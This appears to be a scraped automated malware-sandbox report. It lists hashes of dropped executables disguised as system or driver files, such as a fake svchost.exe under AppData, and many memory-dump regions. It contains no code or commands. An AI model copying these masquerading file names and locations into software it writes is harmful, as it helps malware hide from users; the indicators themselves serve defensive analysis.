45cf46f7764e974e4c406f931517b70d1edd56fa1ff4f861601503061d1fcf2e5b5697245dbd06332dca24b9ee389aa08ef2ce0ca38379ebc2215369005e29a5

Download Submit
C:\Users\Admin\AppData\Roaming\DriverVideocard.exe

MD5
9dbebfb40aa9fdba9c94c13e9aaee095

SHA1
71cf110537941724ea0a417689ff5ed080202b13

SHA256
77d43b383b7683461991994eb77c860b021f52ff655f71c9bf7947abf1522e49

SHA512
f48879fee2c9c564b95c3fefc35e8bbfc42d59370ae6c7e535be809356c1347045c067fbe9f7559a98beaa9c971dd72b75df53bfcb6c9101edbe8f97470b4495

Download Submit
C:\Users\Admin\AppData\Roaming\DriverVideocard.exe

MD5
9dbebfb40aa9fdba9c94c13e9aaee095

SHA1
71cf110537941724ea0a417689ff5ed080202b13

SHA256
77d43b383b7683461991994eb77c860b021f52ff655f71c9bf7947abf1522e49

SHA512
f48879fee2c9c564b95c3fefc35e8bbfc42d59370ae6c7e535be809356c1347045c067fbe9f7559a98beaa9c971dd72b75df53bfcb6c9101edbe8f97470b4495

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5
748724fdc510649040fa3332054b6c47

SHA1
d02c890b7782726eb13ba58be00ec501b102e35d

SHA256
f91801ca6ab1c432ebff96aec275fd7c21cb1adeab6d9afa4cd7f9db1ec4bf3b

SHA512
5266ebbe6f42f44330d68ff46b03b209f023c82329da3d6013bb564a10521cafaf4552304b19c6817e30e03705327be62f2cefdcbf24592ee2da648f79f2eab1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5
748724fdc510649040fa3332054b6c47

SHA1
d02c890b7782726eb13ba58be00ec501b102e35d

SHA256
f91801ca6ab1c432ebff96aec275fd7c21cb1adeab6d9afa4cd7f9db1ec4bf3b

SHA512
5266ebbe6f42f44330d68ff46b03b209f023c82329da3d6013bb564a10521cafaf4552304b19c6817e30e03705327be62f2cefdcbf24592ee2da648f79f2eab1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe

MD5
e70ceaf1fc7771d3d791aedc0c2068a7

SHA1
97912679527c910bdf4c97265656f4c2527245db

SHA256
0e7b9aae7306cdb8cca2a7fa6552fd6cd03f3e2ab2e2d4ae51dfe325ff2016e5

SHA512
6a4c8a424e87f4a622aa20e4fd37060919cf686c32c0432eea026c12af372ffc6714c6baff46d0590a78fddf62ea7ca3eac3240846e1781d090d3867cfc2cd58

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe

MD5
e70ceaf1fc7771d3d791aedc0c2068a7

SHA1
97912679527c910bdf4c97265656f4c2527245db

SHA256
0e7b9aae7306cdb8cca2a7fa6552fd6cd03f3e2ab2e2d4ae51dfe325ff2016e5

SHA512
6a4c8a424e87f4a622aa20e4fd37060919cf686c32c0432eea026c12af372ffc6714c6baff46d0590a78fddf62ea7ca3eac3240846e1781d090d3867cfc2cd58

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe

MD5
e70ceaf1fc7771d3d791aedc0c2068a7

SHA1
97912679527c910bdf4c97265656f4c2527245db

SHA256
0e7b9aae7306cdb8cca2a7fa6552fd6cd03f3e2ab2e2d4ae51dfe325ff2016e5

SHA512
6a4c8a424e87f4a622aa20e4fd37060919cf686c32c0432eea026c12af372ffc6714c6baff46d0590a78fddf62ea7ca3eac3240846e1781d090d3867cfc2cd58

Download Submit
C:\Users\Admin\AppData\Roaming\SafeWindows.exe

MD5
c526e33e55e0c885dce278ec4157a16f

SHA1
a04426b43f3b855a5b95673e063e82ea499c87ce

SHA256
e3dad4cd7e5abebfebfbfd9ce374d479345917f9de03425b1ea3e8db1666c7e0

SHA512
bfb6a60fed6ce40043a9e2dc524857a8dfed9ba22d3ac6d9a5f7fc863639c39fe5a53bcec9981be880e2bcfc4bb5fd6065d044963e674a71511d89e37b87135b

Download Submit
C:\Users\Admin\AppData\Roaming\SafeWindows.exe

MD5
c526e33e55e0c885dce278ec4157a16f

SHA1
a04426b43f3b855a5b95673e063e82ea499c87ce

SHA256
e3dad4cd7e5abebfebfbfd9ce374d479345917f9de03425b1ea3e8db1666c7e0

SHA512
bfb6a60fed6ce40043a9e2dc524857a8dfed9ba22d3ac6d9a5f7fc863639c39fe5a53bcec9981be880e2bcfc4bb5fd6065d044963e674a71511d89e37b87135b

Download Submit
memory/408-157-0x000000001C300000-0x000000001C3A2000-memory.dmp

Filesize
648KB

Download
memory/408-339-0x000000001C2D0000-0x000000001C2D1000-memory.dmp

Filesize
4KB

Download
memory/408-282-0x000000001C2F5000-0x000000001C2F7000-memory.dmp

Filesize
8KB

Download
memory/408-186-0x000000001C2F4000-0x000000001C2F5000-memory.dmp

Filesize
4KB

Download
memory/408-200-0x000000001C2F2000-0x000000001C2F4000-memory.dmp

Filesize
8KB

Download
memory/408-144-0x000000001C2F0000-0x000000001C2F2000-memory.dmp

Filesize
8KB

Download
memory/408-129-0x0000000000000000-mapping.dmp

Download
memory/408-132-0x0000000000630000-0x0000000000631000-memory.dmp

Filesize
4KB

Download
memory/408-325-0x000000001DA10000-0x000000001DA73000-memory.dmp

Filesize
396KB

Download
memory/484-261-0x0000000000000000-mapping.dmp

Download
memory/736-356-0x0000000000000000-mapping.dmp

Download
memory/896-472-0x00000001402F327C-mapping.dmp

Download
memory/896-482-0x0000000140000000-0x0000000140763000-memory.dmp

Filesize
7.4MB

Download
memory/896-484-0x0000000000FC0000-0x0000000000FE0000-memory.dmp

Filesize
128KB

Download
memory/1188-397-0x0000000000000000-mapping.dmp

Download
memory/1212-264-0x0000013B2CFD0000-0x0000013B2CFD2000-memory.dmp

Filesize
8KB

Download
memory/1212-283-0x0000013B2CFD6000-0x0000013B2CFD8000-memory.dmp

Filesize
8KB

Download
memory/1212-248-0x0000000000000000-mapping.dmp

Download
memory/1212-266-0x0000013B2CFD3000-0x0000013B2CFD5000-memory.dmp

Filesize
8KB

Download
memory/1312-407-0x0000000000000000-mapping.dmp

Download
memory/1376-198-0x0000000000000000-mapping.dmp

Download
memory/1376-204-0x0000000000950000-0x0000000000959000-memory.dmp

Filesize
36KB

Download
memory/1376-203-0x0000000000960000-0x0000000000964000-memory.dmp

Filesize
16KB

Download
memory/1520-255-0x0000000000000000-mapping.dmp

Download
memory/1544-161-0x00000179A6560000-0x00000179A6562000-memory.dmp

Filesize
8KB

Download
memory/1544-185-0x00000179A6566000-0x00000179A6568000-memory.dmp

Filesize
8KB

Download
memory/1544-145-0x0000000000000000-mapping.dmp

Download
memory/1544-175-0x00000179C05E0000-0x00000179C05E1000-memory.dmp

Filesize
4KB

Download
memory/1544-162-0x00000179A6563000-0x00000179A6565000-memory.dmp

Filesize
8KB

Download
memory/1544-153-0x00000179A7EB0000-0x00000179A7EB1000-memory.dmp

Filesize
4KB

Download
memory/1744-366-0x0000000000000000-mapping.dmp

Download
memory/1844-191-0x0000000001020000-0x0000000001029000-memory.dmp

Filesize
36KB

Download
memory/1844-190-0x0000000001030000-0x0000000001035000-memory.dmp

Filesize
20KB

Download
memory/1844-187-0x0000000000000000-mapping.dmp

Download
memory/1852-241-0x000001B3D6363000-0x000001B3D6365000-memory.dmp

Filesize
8KB

Download
memory/1852-230-0x0000000000000000-mapping.dmp

Download
memory/1852-274-0x0000000000000000-mapping.dmp

Download
memory/1852-246-0x000001B3D6366000-0x000001B3D6368000-memory.dmp

Filesize
8KB

Download
memory/1852-240-0x000001B3D6360000-0x000001B3D6362000-memory.dmp

Filesize
8KB

Download
memory/1872-211-0x0000000000000000-mapping.dmp

Download
memory/1872-159-0x0000000000530000-0x00000000005A4000-memory.dmp

Filesize
464KB

Download
memory/1872-216-0x00000000005C0000-0x00000000005C5000-memory.dmp

Filesize
20KB

Download
memory/1872-160-0x00000000004C0000-0x000000000052B000-memory.dmp

Filesize
428KB

Download
memory/1872-137-0x0000000000000000-mapping.dmp

Download
memory/1872-218-0x00000000005B0000-0x00000000005B9000-memory.dmp

Filesize
36KB

Download
memory/2072-134-0x0000000001160000-0x0000000001161000-memory.dmp

Filesize
4KB

Download
memory/2072-127-0x0000000000880000-0x0000000000881000-memory.dmp

Filesize
4KB

Download
memory/2072-143-0x000000001B590000-0x000000001B592000-memory.dmp

Filesize
8KB

Download
memory/2072-124-0x0000000000000000-mapping.dmp

Download
memory/2100-471-0x0000000000000000-mapping.dmp

Download
memory/2180-326-0x000002A279CD6000-0x000002A279CD8000-memory.dmp

Filesize
8KB

Download
memory/2180-292-0x000002A279CD0000-0x000002A279CD2000-memory.dmp

Filesize
8KB

Download
memory/2180-285-0x0000000000000000-mapping.dmp

Download
memory/2180-293-0x000002A279CD3000-0x000002A279CD5000-memory.dmp

Filesize
8KB

Download
memory/2260-189-0x0000000000000000-mapping.dmp

Download
memory/2260-193-0x00000000005A0000-0x00000000005AC000-memory.dmp

Filesize
48KB

Download
memory/2260-192-0x00000000005B0000-0x00000000005B6000-memory.dmp

Filesize
24KB

Download
memory/2268-463-0x0000000000000000-mapping.dmp

Download
memory/2268-469-0x000000001BBA0000-0x000000001BBA2000-memory.dmp

Filesize
8KB

Download
memory/2300-260-0x0000000000000000-mapping.dmp

Download
memory/2388-152-0x0000000000000000-mapping.dmp

Download
memory/2696-180-0x0000000000000000-mapping.dmp

Download
memory/2696-184-0x0000000001000000-0x000000000100F000-memory.dmp

Filesize
60KB

Download
memory/2696-183-0x0000000001010000-0x0000000001019000-memory.dmp

Filesize
36KB

Download
memory/2856-271-0x0000000000000000-mapping.dmp

Download
memory/2916-311-0x0000000000000000-mapping.dmp

Download
memory/2916-327-0x0000024152020000-0x0000024152022000-memory.dmp

Filesize
8KB

Download
memory/2916-348-0x0000024152026000-0x0000024152028000-memory.dmp

Filesize
8KB

Download
memory/2916-329-0x0000024152023000-0x0000024152025000-memory.dmp

Filesize
8KB

Download
memory/2924-256-0x0000000000000000-mapping.dmp

Download
memory/2952-118-0x0000000000000000-mapping.dmp

Download
memory/3016-117-0x0000000000FD0000-0x0000000000FE6000-memory.dmp

Filesize
88KB

Download
memory/3088-205-0x000002512D8C3000-0x000002512D8C5000-memory.dmp

Filesize
8KB

Download
memory/3088-202-0x000002512D8C0000-0x000002512D8C2000-memory.dmp

Filesize
8KB

Download
memory/3088-228-0x000002512D8C6000-0x000002512D8C8000-memory.dmp

Filesize
8KB

Download
memory/3088-194-0x0000000000000000-mapping.dmp

Download
memory/3128-116-0x0000000001D90000-0x0000000001E3E000-memory.dmp

Filesize
696KB

Download
memory/3224-114-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3224-115-0x0000000000402FAB-mapping.dmp

Download
memory/3356-462-0x0000000000000000-mapping.dmp

Download
memory/3464-166-0x0000000000000000-mapping.dmp

Download
memory/3464-176-0x00000000005B0000-0x00000000005B7000-memory.dmp

Filesize
28KB

Download
memory/3464-177-0x00000000005A0000-0x00000000005AB000-memory.dmp

Filesize
44KB

Download
memory/3472-342-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

Filesize
4KB

Download
memory/3472-347-0x0000000005940000-0x0000000005941000-memory.dmp

Filesize
4KB

Download
memory/3472-351-0x0000000009240000-0x0000000009241000-memory.dmp

Filesize
4KB

Download
memory/3472-340-0x0000000000000000-mapping.dmp

Download
memory/3472-350-0x0000000009180000-0x0000000009196000-memory.dmp

Filesize
88KB

Download
memory/3472-349-0x00000000058D0000-0x0000000005DCE000-memory.dmp

Filesize
5.0MB

Download
memory/3540-446-0x000000001C950000-0x000000001C952000-memory.dmp

Filesize
8KB

Download
memory/3540-448-0x000000001C954000-0x000000001C955000-memory.dmp

Filesize
4KB

Download
memory/3540-441-0x0000000000000000-mapping.dmp

Download
memory/3540-447-0x000000001C952000-0x000000001C954000-memory.dmp

Filesize
8KB

Download
memory/3540-458-0x000000001C955000-0x000000001C957000-memory.dmp

Filesize
8KB

Download
memory/3548-391-0x000000001C590000-0x000000001C592000-memory.dmp

Filesize
8KB

Download
memory/3548-306-0x0000000000000000-mapping.dmp

Download
memory/3548-308-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/3556-357-0x0000000000000000-mapping.dmp

Download
memory/3680-374-0x0000000000000000-mapping.dmp

Download
memory/3680-382-0x000002125C453000-0x000002125C455000-memory.dmp

Filesize
8KB

Download
memory/3680-392-0x000002125C456000-0x000002125C458000-memory.dmp

Filesize
8KB

Download
memory/3680-427-0x000002125C458000-0x000002125C459000-memory.dmp

Filesize
4KB

Download
memory/3680-381-0x000002125C450000-0x000002125C452000-memory.dmp

Filesize
8KB

Download
memory/3716-368-0x0000000140000000-0x000000014006E000-memory.dmp

Filesize
440KB

Download
memory/3716-369-0x0000000140000000-mapping.dmp

Download
memory/3716-375-0x00000000035C0000-0x0000000003643000-memory.dmp

Filesize
524KB

Download
memory/3716-380-0x000000001C890000-0x000000001C892000-memory.dmp

Filesize
8KB

Download
memory/3748-139-0x0000000000000000-mapping.dmp

Download
memory/3756-257-0x0000000000000000-mapping.dmp

Download
memory/3880-358-0x0000000000000000-mapping.dmp

Download
memory/3880-459-0x0000000001470000-0x0000000001472000-memory.dmp

Filesize
8KB

Download
memory/3916-420-0x0000000000000000-mapping.dmp

Download
memory/3928-355-0x0000000001110000-0x0000000001111000-memory.dmp

Filesize
4KB

Download
memory/3928-352-0x000000001D190000-0x000000001D3B3000-memory.dmp

Filesize
2.1MB

Download
memory/3928-353-0x000000001CD80000-0x000000001CD82000-memory.dmp

Filesize
8KB

Download
memory/3928-278-0x0000000000000000-mapping.dmp

Download
memory/3928-354-0x000000001D3C0000-0x000000001D5CB000-memory.dmp

Filesize
2.0MB

Download
memory/3928-280-0x00000000006C0000-0x00000000006C1000-memory.dmp

Filesize
4KB

Download
memory/4008-258-0x0000000000000000-mapping.dmp

Download
memory/4040-209-0x00000000008C0000-0x00000000008C9000-memory.dmp

Filesize
36KB

Download
memory/4040-207-0x0000000000000000-mapping.dmp

Download
memory/4040-165-0x00000000005E0000-0x00000000005EC000-memory.dmp

Filesize
48KB

Download
memory/4040-154-0x0000000000000000-mapping.dmp

Download
memory/4040-208-0x00000000008D0000-0x00000000008D5000-memory.dmp

Filesize
20KB

Download
memory/4040-164-0x00000000005F0000-0x00000000005F7000-memory.dmp

Filesize
28KB

Download
memory/4080-141-0x0000000006D80000-0x0000000006D81000-memory.dmp

Filesize
4KB

Download
memory/4080-142-0x000000007EA70000-0x000000007EE41000-memory.dmp

Filesize
3.8MB

Download
memory/4080-440-0x0000000005280000-0x0000000005886000-memory.dmp

Filesize
6.0MB

Download
memory/4080-430-0x000000000041C5A2-mapping.dmp

Download
memory/4080-146-0x0000000006CB0000-0x0000000006CB1000-memory.dmp

Filesize
4KB

Download
memory/4080-151-0x0000000006CF0000-0x0000000006CF1000-memory.dmp

Filesize
4KB

Download
memory/4080-140-0x0000000004840000-0x0000000004841000-memory.dmp

Filesize
4KB

Download
memory/4080-158-0x0000000004820000-0x0000000004832000-memory.dmp

Filesize
72KB

Download
memory/4080-135-0x00000000008F0000-0x00000000008F2000-memory.dmp

Filesize
8KB

Download
memory/4080-138-0x0000000007280000-0x0000000007281000-memory.dmp

Filesize
4KB

Download
memory/4080-227-0x0000000009370000-0x0000000009371000-memory.dmp

Filesize
4KB

Download
memory/4080-121-0x0000000000000000-mapping.dmp

Download
memory/4080-224-0x0000000008FB0000-0x0000000008FB1000-memory.dmp

Filesize
4KB

Download
memory/4080-221-0x0000000008FD0000-0x0000000008FD1000-memory.dmp

Filesize
4KB

Download
memory/4080-220-0x0000000008CE0000-0x0000000008CE1000-memory.dmp

Filesize
4KB

Download
memory/4080-219-0x0000000009990000-0x0000000009991000-memory.dmp

Filesize
4KB

Download
memory/4080-215-0x0000000009460000-0x0000000009461000-memory.dmp

Filesize
4KB

Download
memory/4080-212-0x0000000008D60000-0x0000000008D61000-memory.dmp

Filesize
4KB

Download